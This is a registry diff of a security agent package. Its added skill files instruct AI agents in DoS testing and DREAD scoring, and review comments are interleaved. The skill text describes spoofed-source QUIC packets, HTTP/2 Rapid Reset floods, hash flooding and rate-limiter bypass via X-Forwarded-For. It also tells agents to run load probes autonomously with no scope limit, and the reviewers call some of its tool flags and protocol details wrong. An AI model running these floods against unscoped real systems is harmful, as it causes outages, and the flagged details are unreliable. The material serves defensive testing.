security-mcp 1.1.4 → 1.3.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +341 -1018
- package/defaults/checklists/ai.json +20 -1
- package/defaults/checklists/api.json +35 -1
- package/defaults/checklists/infra.json +34 -1
- package/defaults/checklists/mobile.json +23 -1
- package/defaults/checklists/payments.json +15 -1
- package/defaults/checklists/web.json +11 -1
- package/defaults/cloud-controls/aws.json +10712 -0
- package/defaults/cloud-controls/azure.json +7201 -0
- package/defaults/cloud-controls/gcp.json +4061 -0
- package/defaults/control-catalog.json +24 -0
- package/defaults/security-policy.json +2 -2
- package/dist/ci/pr-gate.js +22 -5
- package/dist/cli/index.js +73 -2
- package/dist/cli/install.js +4 -55
- package/dist/cli/onboarding.js +18 -10
- package/dist/gate/baseline.js +82 -7
- package/dist/gate/catalog.js +10 -2
- package/dist/gate/checks/agentic-instructions.js +515 -0
- package/dist/gate/checks/ai-governance.js +132 -0
- package/dist/gate/checks/ai.js +757 -39
- package/dist/gate/checks/auth-deep.js +920 -216
- package/dist/gate/checks/business-logic.js +751 -0
- package/dist/gate/checks/ci-pipeline.js +399 -4
- package/dist/gate/checks/cloud-controls.js +69 -0
- package/dist/gate/checks/crypto.js +423 -2
- package/dist/gate/checks/data-platform.js +954 -0
- package/dist/gate/checks/dependencies.js +582 -15
- package/dist/gate/checks/docker-deep.js +1236 -0
- package/dist/gate/checks/gitops.js +724 -0
- package/dist/gate/checks/graphql.js +201 -19
- package/dist/gate/checks/iac.js +1230 -0
- package/dist/gate/checks/infra.js +246 -1
- package/dist/gate/checks/injection-deep.js +827 -184
- package/dist/gate/checks/k8s.js +955 -2
- package/dist/gate/checks/mobile-android.js +917 -3
- package/dist/gate/checks/mobile-ios.js +797 -5
- package/dist/gate/checks/required-artifacts.js +194 -0
- package/dist/gate/checks/runtime.js +178 -0
- package/dist/gate/checks/secrets.js +256 -13
- package/dist/gate/checks/supply-chain-deep.js +787 -0
- package/dist/gate/checks/web-nextjs.js +572 -48
- package/dist/gate/cloud-controls/apply.js +115 -0
- package/dist/gate/cloud-controls/bicep.js +36 -0
- package/dist/gate/cloud-controls/cfn.js +125 -0
- package/dist/gate/cloud-controls/detect.js +104 -0
- package/dist/gate/cloud-controls/hcl.js +140 -0
- package/dist/gate/cloud-controls/types.js +87 -0
- package/dist/gate/diff.js +17 -5
- package/dist/gate/evidence.js +8 -1
- package/dist/gate/exceptions.js +202 -9
- package/dist/gate/findings.js +15 -2
- package/dist/gate/policy.js +316 -130
- package/dist/gate/threat-intel.js +6 -0
- package/dist/mcp/audit-chain.js +131 -28
- package/dist/mcp/auth.js +169 -0
- package/dist/mcp/learning.js +129 -4
- package/dist/mcp/model-router.js +161 -24
- package/dist/mcp/orchestration.js +377 -89
- package/dist/mcp/server.js +460 -69
- package/dist/mcp/tool-audit.js +193 -0
- package/dist/repo/fs.js +37 -1
- package/dist/repo/search.js +31 -6
- package/dist/review/store.js +56 -3
- package/dist/tests/run.js +124 -1
- package/package.json +9 -9
- package/skills/_TEMPLATE/SKILL.md +99 -0
- package/skills/advanced-dos-tester/SKILL.md +118 -0
- package/skills/agentic-instruction-auditor/SKILL.md +111 -0
- package/skills/agentic-loop-exploiter/SKILL.md +377 -0
- package/skills/ai-llm-redteam/SKILL.md +113 -0
- package/skills/ai-model-supply-chain-agent/SKILL.md +112 -0
- package/skills/algorithm-implementation-reviewer/SKILL.md +107 -0
- package/skills/android-penetration-tester/SKILL.md +464 -46
- package/skills/anti-replay-tester/SKILL.md +115 -0
- package/skills/appsec-code-auditor/SKILL.md +94 -0
- package/skills/artifact-integrity-analyst/SKILL.md +450 -0
- package/skills/attack-navigator/SKILL.md +476 -8
- package/skills/auth-session-hacker/SKILL.md +111 -0
- package/skills/aws-penetration-tester/SKILL.md +510 -0
- package/skills/azure-penetration-tester/SKILL.md +542 -3
- package/skills/binary-auth-validator/SKILL.md +120 -0
- package/skills/bot-detection-specialist/SKILL.md +118 -0
- package/skills/business-logic-attacker/SKILL.md +240 -0
- package/skills/capec-code-mapper/SKILL.md +93 -0
- package/skills/cert-pin-rotation-specialist/SKILL.md +121 -0
- package/skills/cicd-pipeline-hijacker/SKILL.md +414 -0
- package/skills/ciso-orchestrator/SKILL.md +465 -43
- package/skills/cloud-infra-specialist/SKILL.md +127 -0
- package/skills/compliance-gap-analyst/SKILL.md +431 -0
- package/skills/compliance-grc/SKILL.md +94 -0
- package/skills/compliance-lifecycle-tracker/SKILL.md +93 -0
- package/skills/container-hardening-auditor/SKILL.md +125 -0
- package/skills/credential-stuffing-specialist/SKILL.md +111 -0
- package/skills/crypto-pki-specialist/SKILL.md +96 -0
- package/skills/csa-ccm-mapper/SKILL.md +93 -0
- package/skills/csf2-governance-mapper/SKILL.md +93 -0
- package/skills/data-platform-auditor/SKILL.md +125 -0
- package/skills/deep-link-fuzzer/SKILL.md +118 -0
- package/skills/dependency-confusion-attacker/SKILL.md +424 -0
- package/skills/device-integrity-aggregator/SKILL.md +117 -0
- package/skills/dos-resilience-tester/SKILL.md +106 -0
- package/skills/dread-scorer/SKILL.md +93 -0
- package/skills/egress-policy-enforcer/SKILL.md +108 -0
- package/skills/evidence-collector/SKILL.md +107 -0
- package/skills/file-upload-attacker/SKILL.md +118 -0
- package/skills/gcp-penetration-tester/SKILL.md +510 -2
- package/skills/git-history-secret-scanner/SKILL.md +115 -0
- package/skills/gitops-delivery-auditor/SKILL.md +120 -0
- package/skills/iac-security-auditor/SKILL.md +125 -0
- package/skills/iam-privesc-graph-builder/SKILL.md +161 -0
- package/skills/incident-responder/SKILL.md +120 -0
- package/skills/injection-specialist/SKILL.md +111 -0
- package/skills/ios-security-auditor/SKILL.md +291 -0
- package/skills/json-ambiguity-tester/SKILL.md +145 -0
- package/skills/k8s-container-escaper/SKILL.md +406 -0
- package/skills/key-management-lifecycle-analyst/SKILL.md +107 -0
- package/skills/kill-switch-engineer/SKILL.md +111 -0
- package/skills/linddun-privacy-analyst/SKILL.md +111 -0
- package/skills/logic-race-fuzzer/SKILL.md +452 -0
- package/skills/mobile-api-network-attacker/SKILL.md +430 -0
- package/skills/mobile-binary-hardener/SKILL.md +111 -0
- package/skills/mobile-security-specialist/SKILL.md +94 -0
- package/skills/mobile-webview-auditor/SKILL.md +105 -0
- package/skills/model-extraction-attacker/SKILL.md +228 -0
- package/skills/multipart-abuse-tester/SKILL.md +93 -0
- package/skills/oauth-pkce-specialist/SKILL.md +113 -0
- package/skills/parser-exhaustion-tester/SKILL.md +151 -0
- package/skills/pentest-infra/SKILL.md +107 -0
- package/skills/pentest-social/SKILL.md +210 -0
- package/skills/pentest-team/SKILL.md +96 -0
- package/skills/pentest-web-api/SKILL.md +107 -0
- package/skills/privacy-flow-analyst/SKILL.md +243 -0
- package/skills/prompt-injection-specialist/SKILL.md +403 -0
- package/skills/quantum-migration-planner/SKILL.md +105 -0
- package/skills/rag-poisoning-specialist/SKILL.md +367 -0
- package/skills/registry-mirror-enforcer/SKILL.md +93 -0
- package/skills/rotation-validation-agent/SKILL.md +121 -0
- package/skills/samm-assessor/SKILL.md +94 -0
- package/skills/secrets-mask-bypass-tester/SKILL.md +109 -0
- package/skills/senior-security-engineer/SKILL.md +178 -0
- package/skills/serialization-memory-attacker/SKILL.md +341 -0
- package/skills/session-timeout-tester/SKILL.md +170 -0
- package/skills/slsa-level3-enforcer/SKILL.md +121 -0
- package/skills/slsa-provenance-enforcer/SKILL.md +111 -0
- package/skills/ssrf-detection-validator/SKILL.md +117 -0
- package/skills/step-up-auth-enforcer/SKILL.md +93 -0
- package/skills/stride-pasta-analyst/SKILL.md +429 -0
- package/skills/supply-chain-devsecops/SKILL.md +107 -0
- package/skills/threat-infrastructure-analyst/SKILL.md +93 -0
- package/skills/threat-modeler/SKILL.md +94 -0
- package/skills/tls-certificate-auditor/SKILL.md +582 -18
- package/skills/token-reuse-detector/SKILL.md +104 -0
- package/skills/trike-risk-modeler/SKILL.md +93 -0
- package/skills/unicode-homograph-tester/SKILL.md +93 -0
- package/skills/waf-rule-lifecycle-agent/SKILL.md +106 -0
- package/skills/webhook-security-tester/SKILL.md +111 -0
- package/skills/zero-trust-architect/SKILL.md +118 -0
|
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The `runtime` detection module (`src/gate/checks/runtime.ts`) is your deterministic floor, not your ceiling. Treat its finding IDs as the minimum, then reason past single-line/single-file pattern matching — and APPLY the fix (Edit), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a body-size limit on the Express app means nothing if a GraphQL resolver fans out N+1 queries or a route handler calls `findMany()` with no `take` — trace user-controlled `limit`/`page`/query-depth params through to the actual DB or regex sink, across files, to find the unbounded path.
|
|
42
|
+
- **Semantic / effective-state analysis:** model the algorithmic-complexity blast radius — does a crafted input cause catastrophic regex backtracking, GraphQL alias amplification, hash-flooding, or HTTP/2 Rapid Reset? Compute whether a single request can exhaust CPU/memory/DB connections, not just whether a `limit` literal appears somewhere.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for current ReDoS/DoS CVEs in transitive dependencies and HTTP/2/QUIC amplification advisories for the server stack in use.
|
|
44
|
+
- **Apply & prove:** write the fix inline (body/pagination caps, RE2 for nested-quantifier regex, depth+complexity rules, outbound `AbortSignal.timeout`, pool limits), re-run the `runtime` checks plus `safe-regex`/`osv-scanner` and a `k6`/`slowhttptest` load probe as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
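Review bot: the first `+` paragraph points readers at `src/gate/checks/runtime.ts`, but the file list for this release ships only `package/dist/gate/checks/runtime.js`; a user of the published package cannot locate the referenced source, so either cite the shipped `dist/` path or state that `src/` exists only in the repository. The "Apply & prove" bullet also tells the agent to run `k6`/`slowhttptest` load probes with no scope constraint; since the section instructs the agent to act autonomously, add the requirement that load probes run only against the staging/test target named in the engagement scope, and have the agent record that target alongside the LEARNING SIGNAL it emits per fix.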
@@ -182,3 +191,100 @@ If internet permitted:
|
|
|
182
191
|
- `requiredActions`: ordered action list
|
|
183
192
|
- `complianceImpact`: framework mappings
|
|
184
193
|
- `beyondSkillMd`: true if finding goes beyond the SKILL.md mandate
|
|
194
|
+
|
|
195
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
196
|
+
```json
|
|
197
|
+
{
|
|
198
|
+
"intelligenceForOtherAgents": {
|
|
199
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "Endpoint with no rate limit or body-size cap — ideal DoS entry point", "exploitHint": "Send concurrent slow-loris or large-body floods to this path" }],
|
|
200
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "N/A — refer if TLS session renegotiation DoS found", "location": "" }],
|
|
201
|
+
"forCloudSpecialist": [{ "type": "RESOURCE_EXHAUSTION_CHAIN", "exhaustionLocation": "No Pod CPU/memory limits set", "escalationPath": "Single flooded pod triggers OOMKill, cascades to sibling pods on same node" }],
|
|
202
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["PCI DSS Req 6.4.1", "SOC 2 A1.1", "NIST SP 800-53 SC-5"], "releaseBlock": true }]
|
|
203
|
+
}
|
|
204
|
+
}
|
|
205
|
+
```
|
|
206
|
+
|
|
207
|
+
## BEYOND SKILL.MD — MANDATORY EXPANSIONS
|
|
208
|
+
|
|
209
|
+
- **HTTP/2 Rapid Reset Attack (CVE-2023-44487 / ATT&CK T1499.002):** Attacker sends a stream of RST_STREAM frames immediately after HEADERS frames, forcing the server to allocate and immediately tear down streams at extremely high rate — the attack that took down Cloudflare, Google, and AWS simultaneously in Oct 2023. Test by: use `h2load` or a custom HTTP/2 client to send 1 000 concurrent stream open+reset cycles per second; measure server CPU and connection-handler goroutine/thread count. Finding threshold: if CPU exceeds 80% at < 10 Mbps inbound traffic, the server is unpatched or unmitigated — verify `nghttp2`/`hyper`/`netty` version and check `SETTINGS_MAX_CONCURRENT_STREAMS` is enforced at ≤ 100.
|
|
210
|
+
|
|
211
|
+
- **AI-Generated Semantically Valid Flood (ATT&CK T1499.003):** LLM-assisted tools (e.g., FuzzAI, RESTler with GPT guidance) generate structurally and semantically valid API requests — valid auth tokens, realistic field values, correct content-type — that bypass all WAF signature rules and appear as legitimate user traffic. Test by: replay a 48-hour production request log through a load injector at 100× normal rate; if rate limiting does not trigger because requests look "normal," behavioural anomaly detection is absent. Finding threshold: any endpoint that can be flooded at 10× normal RPS without a 429 response using realistic-looking payloads is a confirmed finding.
|
|
212
|
+
|
|
213
|
+
- **QUIC/HTTP3 Address Amplification via Stateless Retry (CVE-2022-30592 / QUIC RFC 9000 §8.1):** QUIC's stateless retry mechanism allows an attacker to spoof a victim's source IP and direct a bandwidth-amplified response stream at the victim before connection establishment completes. Any service advertising `Alt-Svc: h3` is a potential reflector. Test by: send a QUIC Initial packet with a spoofed source IP to the service using `quic-go`'s test harness; confirm the Retry packet is sent to the spoofed address and measure the amplification factor. Finding threshold: amplification factor > 3× is a reportable finding; absence of address validation tokens (the fix) is always CRITICAL.
|
|
214
|
+
|
|
215
|
+
- **Supply-Chain ReDoS via Transitive Dependency (e.g., `ua-parser-js` CVE-2021-27292, `validator.js` CVE-2021-3765):** Malicious or unpatched regex in a transitive npm/PyPI dependency executes in the hot request-handling path — not in application code the developer wrote. The application passes all own-code ReDoS checks. Test by: run `npx safe-regex-cli --deep` against the full `node_modules` tree (not just app source); additionally run `npm audit` filtered for `redos` and cross-reference against the OSV database (`osv.dev`). Finding threshold: any reachable transitive dependency with a known ReDoS CVE in a code path touched by user-controlled input is CRITICAL.
|
|
216
|
+
|
|
217
|
+
- **GraphQL Persisted Query Cache Poisoning as DoS (ATT&CK T1499.003):** Attackers register an extremely expensive persisted query hash, then flood the API with that hash ID. The server looks up the pre-registered query and executes it at full cost — bypassing body-size and query-string-length limits because the request body is just a short hash string. Test by: register a deeply nested persisted query that hits the complexity cap, then send 500 concurrent requests with that hash; confirm the server's complexity limiter still fires per-request even for persisted queries. Finding threshold: if persisted query execution bypasses complexity or depth validation, severity is CRITICAL.
|
|
218
|
+
|
|
219
|
+
- **EU Cyber Resilience Act (CRA) + NIS2 Availability Attestation Gap (2026 enforcement):** CRA Article 13 and NIS2 Article 21 require documented and tested DDoS mitigation SLAs for products and essential services respectively. Most teams have informal WAF/CDN configs but no auditable test evidence. Test by: run a structured availability stress test (e.g., `k6` at 5× peak load) and record the test plan, results, RTO observed, and failover behaviour in a machine-readable artefact; verify the artefact is committed to the repo and referenced in the security policy document. Finding threshold: absence of a dated, versioned availability test report with measured RTO/RPO is a compliance blocker for any EU-market product subject to CRA or NIS2.
|
|
220
|
+
|
|
221
|
+
## §EDGE-CASE-MATRIX
|
|
222
|
+
|
|
223
|
+
The 5 DoS attack cases that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
224
|
+
|
|
225
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
226
|
+
|---|-----------|----------------------|---------------|
|
|
227
|
+
| 1 | GraphQL alias/fragment amplification — one request fans out to thousands of resolver calls via aliased repeated fields | Depth/complexity rules count nodes once; aliases let attackers clone a costly field 500× under one depth level | Submit `{ a1: expensiveField a2: expensiveField … a500: expensiveField }` — measure DB queries emitted; should be rejected by complexity budget |
|
|
228
|
+
| 2 | Rate-limiter bypass via IP rotation through a trusted proxy header (`X-Forwarded-For` spoofing) | Rate limiter reads `req.ip` which honours the first `X-Forwarded-For` value — attacker cycles fake IPs | Send requests with `X-Forwarded-For: <random_ip>` and verify the limiter still enforces per-real-IP; check `trust proxy` config |
|
|
229
|
+
| 3 | Algorithmic DoS via hash-collision (hash flooding) — POST bodies with many keys that collide in the server's hash map, forcing O(n²) insert | Static code analysis sees a normal JSON parse; the exploit is data-dependent | POST a body with 10 000 crafted keys known to collide in V8's object hash (use `hash-flood` corpus); measure CPU time vs. 10 000 normal keys |
|
|
230
|
+
| 4 | Slow-read attack — attacker advertises a tiny TCP receive window, forcing the server to drip-send responses and hold connections open indefinitely | Load testers measure throughput; slow-read holds a socket without sending traffic, which doesn't trigger standard request-rate rules | Use `slowhttptest -B` (slow read mode) against the target; server should enforce a minimum send-rate timeout and close stalled connections |
|
|
231
|
+
| 5 | ReDoS triggered at serialisation time — regex applied during JSON serialisation or logging of the response body, not during input validation | Input-phase scanners test the validation layer; the dangerous regex runs on output after all guards have passed | Trace all regex calls that touch `res.body` or log formatters; submit a deeply nested object that causes catastrophic backtracking in the serialiser's key-name sanitiser |
|
|
232
|
+
|
|
233
|
+
## §TEMPORAL-THREATS
|
|
234
|
+
|
|
235
|
+
Threats materialising in the 2025–2030 window that DoS defences designed today must account for.
|
|
236
|
+
|
|
237
|
+
| Threat | Est. Timeline | Relevance to DoS Domain | Prepare Now By |
|
|
238
|
+
|--------|--------------|--------------------------|----------------|
|
|
239
|
+
| AI-assisted flood generation — LLMs generate valid, application-aware request payloads that bypass content-based WAF rules | 2025–2027 (active) | Application-layer floods look semantically legitimate; signature-based WAFs block nothing | Move to behavioural rate limiting (request velocity + entropy of params) rather than signature matching |
|
|
240
|
+
| HTTP/3 + QUIC amplification — QUIC's stateless handshake allows reflection amplification before connection establishment | 2025–2026 | Any service enabling HTTP/3 is a new reflection target | Audit `Alt-Svc` headers; implement QUIC address validation tokens; cap max QUIC connections per source |
|
|
241
|
+
| eBPF-based kernel-level flood bypass — attackers use eBPF programs on compromised hosts to craft floods that bypass userspace rate limiters | 2026–2028 | Kernel-crafted floods have no userspace fingerprint | Enforce rate limiting at the CDN/network edge (not only in the app process); deploy TCP SYN cookies at kernel level |
|
|
242
|
+
| EU CRA (Cyber Resilience Act) availability SLA requirements | 2026 enforcement | Products must demonstrate quantified availability controls or face fines | Document and test uptime SLAs, DDoS mitigation SLAs, and failover RTO/RPO — make them auditable |
|
|
243
|
+
| Serverless/FaaS cold-start cost amplification attacks — adversaries trigger thousands of cold starts to exhaust cloud budget | 2025 (active) | Cold starts cost 10–50× more compute per request; an attacker can bankrupt a serverless app without exceeding request rate limits | Set max concurrency limits on all Lambda/Cloud Run/Functions; implement spending alerts with auto-shutdown at budget cap |
|
|
244
|
+
|
|
245
|
+
## §DETECTION-GAP
|
|
246
|
+
|
|
247
|
+
What current security monitoring CANNOT detect in the DoS domain, and what to build to close each gap.
|
|
248
|
+
|
|
249
|
+
- **GraphQL alias amplification**: No log event distinguishes `{ a: field }` from `{ a1: field a2: field … a500: field }` — the query looks like one request. **Need**: log the computed complexity score per query; alert when complexity > 80% of the cap.
|
|
250
|
+
- **Rate-limiter IP spoofing via X-Forwarded-For**: Limiter enforces correctly per its view of `req.ip`, but the true attacker IP is never logged. **Need**: log both `req.ip` (as seen by the app) and the raw `X-Forwarded-For` header value; cross-correlate in SIEM to detect single-actor cycling.
|
|
251
|
+
- **Slow-loris / slow-read in progress**: Each connection looks idle — no request rate anomaly fires. **Need**: track per-connection duration at the load balancer layer; alert on connections open > 30 s with < 1 KB transferred.
|
|
252
|
+
- **Algorithmic / hash-flood CPU spike**: CPU alarm fires, but the cause looks like a traffic spike. **Need**: instrument the JSON-parsing layer with a per-request timer; when parse time exceeds 50 ms for a payload < 100 KB, flag it as a potential hash-flood candidate and log the key count.
|
|
253
|
+
- **Serverless cost-amplification attack**: Cloud billing alarms lag by hours; the attack drains budget before the alert fires. **Need**: real-time concurrency and invocation-count dashboards with p95 alerts; set hard concurrency caps on every function, not just aggregate billing alerts.
|
|
254
|
+
- **Cross-agent chain — DoS + Auth bypass**: An auth bypass (Phase 1 finding from auth-bypass agent) that allows unauthenticated access to expensive endpoints is a force-multiplier for DoS. **Need**: CISO orchestrator synthesis step — any unauth endpoint flagged by auth-bypass agent must be re-scored by this agent for DoS blast radius.
|
|
255
|
+
|
|
256
|
+
## §ZERO-MISS-MANDATE
|
|
257
|
+
|
|
258
|
+
This agent CANNOT declare any DoS attack class clean without explicit evidence of checking. For each item, output one of:
|
|
259
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
260
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
261
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
262
|
+
|
|
263
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
264
|
+
|
|
265
|
+
**Mandatory DoS attack classes to cover:**
|
|
266
|
+
|
|
267
|
+
| Attack Class | Grep Patterns | Must Check |
|
|
268
|
+
|---|---|---|
|
|
269
|
+
| Unbounded DB queries | `findAll\|findMany\|\.all\(\)\|SELECT \*` without `LIMIT\|take\|limit` | Every ORM/raw query call site |
|
|
270
|
+
| Missing body size limit | `express\(\)\|bodyParser\|fastify\|createServer` | Server init files |
|
|
271
|
+
| ReDoS-vulnerable regex | Nested quantifiers: `\(\.\*\)\+\|\(\.\+\)\*\|\([a-z\]\+\)\*` | All regex literals in hot paths |
|
|
272
|
+
| No GraphQL depth/complexity limit | `ApolloServer\|makeExecutableSchema\|yoga\|graphql-ws` without `depthLimit\|complexityLimit` | GraphQL server config |
|
|
273
|
+
| No pagination cap | `page=\|offset=\|limit=` query param handling | All list/search endpoints |
|
|
274
|
+
| No outbound HTTP timeout | `fetch\|axios\|got\|request\|http\.get` without `timeout\|AbortSignal` | All external HTTP calls |
|
|
275
|
+
| No DB connection pool limit | `PrismaClient\|createPool\|knex\|mongoose\.connect` | DB client init files |
|
|
276
|
+
| Synchronous blocking I/O in request handler | `readFileSync\|execSync\|spawnSync` inside route handlers | Route handler files |
|
|
277
|
+
|
|
278
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
279
|
+
```json
|
|
280
|
+
{
|
|
281
|
+
"coverageManifest": {
|
|
282
|
+
"attackClassesCovered": [
|
|
283
|
+
{ "class": "Unbounded DB Query", "filesReviewed": 34, "patterns": ["findMany without take", "SELECT * without LIMIT"], "result": "2 findings — fixed" },
|
|
284
|
+
{ "class": "ReDoS Regex", "filesReviewed": 22, "patterns": ["nested quantifier regex literals"], "result": "CLEAN" }
|
|
285
|
+
],
|
|
286
|
+
"filesReviewed": 47,
|
|
287
|
+
"negativeAssertions": ["ReDoS: nested-quantifier regex searched across 22 files — 0 matches"],
|
|
288
|
+
"uncoveredReason": {}
|
|
289
|
+
}
|
|
290
|
+
}
|
|
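Review bot: edge-case row 4 of the §EDGE-CASE-MATRIX table names `slowhttptest -B` as "slow read mode", but `-B` is slowhttptest's slow message body (slow POST) mode; slow read is `-X`, so the concrete test as written exercises a different attack class than the row describes. The QUIC bullet presents the Retry packet as the amplification vector, whereas in RFC 9000 §8.1 Retry is the address-validation step and the section's three-times anti-amplification limit is what bounds bytes sent to an unvalidated address; the test should measure bytes emitted toward the unvalidated address against bytes received, which is consistent with the bullet's own `> 3×` threshold, and the finding text should say so. The ReDoS bullet runs `npx safe-regex-cli --deep` while the "Apply & prove" step in the earlier hunk names `safe-regex`; settle on one tool and confirm the `--deep` flag exists before making the check mandatory.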
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The full suite of detection modules in `src/gate/checks/` (especially `injection-deep.ts`, `infra.ts`, `runtime.ts`, and `auth-deep.ts`) is the deterministic input you score — their finding IDs are your floor, not your ceiling. Treat every emitted finding as the minimum population, then reason past single-line/single-file pattern matching when calibrating each D/R/E/A/D dimension — and APPLY the score-driven re-prioritisation (Edit the risk register), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a SQLi finding from `injection-deep.ts` and an IAM `iam:PassRole` finding from `infra.ts` may each be HIGH alone but compose into a 50/50 chain — score the chain, not the parts. Raise Affected-Users / Damage when the data-flow connects two single-file findings.
|
|
42
|
+
- **Semantic / effective-state analysis:** recompute Discoverability for public/open-source code (LLM-fuzzing lifts D=3→7), apply the TOCTOU Reproducibility correction for race findings, and record a temporal-DREAD score for harvest-now-decrypt-later crypto findings.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for CISA KEV, EPSS, and active-exploitation status to anchor Exploitability and Discoverability against real-world data, not assumption.
|
|
44
|
+
- **Apply & prove:** write the re-ranked register inline, re-run the upstream module checks (e.g. `injection-deep`/`runtime`) so the scored finding set matches a regression floor, then re-audit ordering against CVSS. Emit the LEARNING SIGNAL per scored finding; surface trade-offs where DREAD and CVSS diverge.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
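Review bot: the first `+` paragraph points readers at `src/gate/checks/` (`injection-deep.ts`, `infra.ts`, `runtime.ts`, `auth-deep.ts`), but this release ships those modules as `package/dist/gate/checks/*.js` per the file list; cite the shipped paths or note that `src/` is repository-only. The bullet skeleton is also copied from the DoS skill's section of the same name, including the heading "Cross-file / data-flow reasoning the regex can't do", which reads oddly for a scoring agent that runs no regex of its own; reword that bullet around chain composition (the SQLi + `iam:PassRole` example), which is its actual content.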
@@ -155,3 +164,87 @@ Priority: Address within 30 days
|
|
|
155
164
|
- `requiredActions`: risk-ordered remediation list
|
|
156
165
|
- `complianceImpact`: inherited framework mappings
|
|
157
166
|
- `beyondSkillMd`: true — this agent is entirely beyond-policy
|
|
167
|
+
|
|
168
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
169
|
+
```json
|
|
170
|
+
{
|
|
171
|
+
"intelligenceForOtherAgents": {
|
|
172
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "...", "exploitHint": "..." }],
|
|
173
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "...", "location": "..." }],
|
|
174
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "...", "escalationPath": "..." }],
|
|
175
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["..."], "releaseBlock": true }]
|
|
176
|
+
}
|
|
177
|
+
}
|
|
178
|
+
```
|
|
179
|
+
|
|
180
|
+
## BEYOND SKILL.MD
|
|
181
|
+
|
|
182
|
+
Domain-specific expansions for DREAD scoring — concrete CVEs, techniques, tools, and research findings that sharpen score calibration:
|
|
183
|
+
|
|
184
|
+
- **CVE-2021-44228 (Log4Shell)** — DREAD baseline reference: scored 50/50 in nearly every real-world assessment. Use this as the anchor for "what a true 50 looks like": unauthenticated RCE, trivially reproducible, weaponized within hours, affects every internet-facing system running Log4j 2.x. Any finding that does not approach all five dimensions simultaneously should not score 45+.
|
|
185
|
+
- **CVE-2022-0847 (Dirty Pipe)** — canonical example of asymmetric DREAD scoring: Exploitability=9 (public PoC, minutes to root), Affected Users=3 (requires local shell). Total ~35, not 50. Use to calibrate that high E without wide A caps the score significantly.
|
|
186
|
+
- **CVSS vs. DREAD divergence** — CVSS AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0, but DREAD Affected Users may be 1 if the vulnerable endpoint is only reachable by a single internal service. Always reconcile CVSS ≥9.0 findings against DREAD A score before sprint-assigning them as CRITICAL.
|
|
187
|
+
- **AI-era threat: LLM-assisted fuzzing multiplies Discoverability scores** — Tools such as OSS-Fuzz + Llama-based harness generation (Google Project Zero, 2024) mean that findings previously scored D=3 (requires source code) should now score D=7 if the codebase is public or the binary is decompilable. Adjust D scores upward by 2-3 for any public-facing open-source component.
|
|
188
|
+
- **AI-era threat: Automated exploit generation (Exploit.ai / Vulnhuntr)** — LLM-powered end-to-end PoC generation (e.g., Vulnhuntr, 2024 research: https://github.com/protectai/vulnhuntr) can reduce time-to-exploit from days to minutes for logic flaws in Python and JavaScript. Any finding in an interpreted language with a public PoC framework available should receive E≥8.
|
|
189
|
+
- **Post-quantum harvest-now-decrypt-later** — Scored via a specialised DREAD extension: Damage=10 (full retroactive plaintext), Reproducibility=10 (passive capture requires no auth), Exploitability=2 today but trending to 9 by 2030 (CRQC timeline), Affected Users=10 (all users whose data was ever transmitted), Discoverability=10 (network traffic is observable). Record a "temporal DREAD" score alongside the present-day score so the risk register captures forward exposure.
|
|
190
|
+
- **CVE-2023-44487 (HTTP/2 Rapid Reset)** — Reproducibility=10, Affected Users=10 for any HTTP/2-enabled service. Exploitability=8 (public tooling, Slowloris-style). Use as the benchmark for pure availability/DoS findings: high R and A can push a DoS to CRITICAL even when Damage is "only" availability loss.
|
|
191
|
+
- **TOCTOU scoring rule** — Race-condition findings are systematically under-scored because Reproducibility appears low in single-threaded testing. Apply a TOCTOU correction: if a race condition is exploitable with concurrent threads (as in CVE-2022-21449 "Psychic Signatures"), set R≥7 regardless of observed single-thread reliability. Document the correction in the evidence field.
|
|
192
|
+
|
|
193
|
+
---
|
|
194
|
+
|
|
195
|
+
## §EDGE-CASE-MATRIX
|
|
196
|
+
|
|
197
|
+
The 5 attack cases in this domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
198
|
+
|
|
199
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
200
|
+
|---|-----------|----------------------|---------------|
|
|
201
|
+
| 1 | Second-order / stored payload executed in different context | Scanner checks input context, not execution context | Store payload safely; trigger in separate request/session |
|
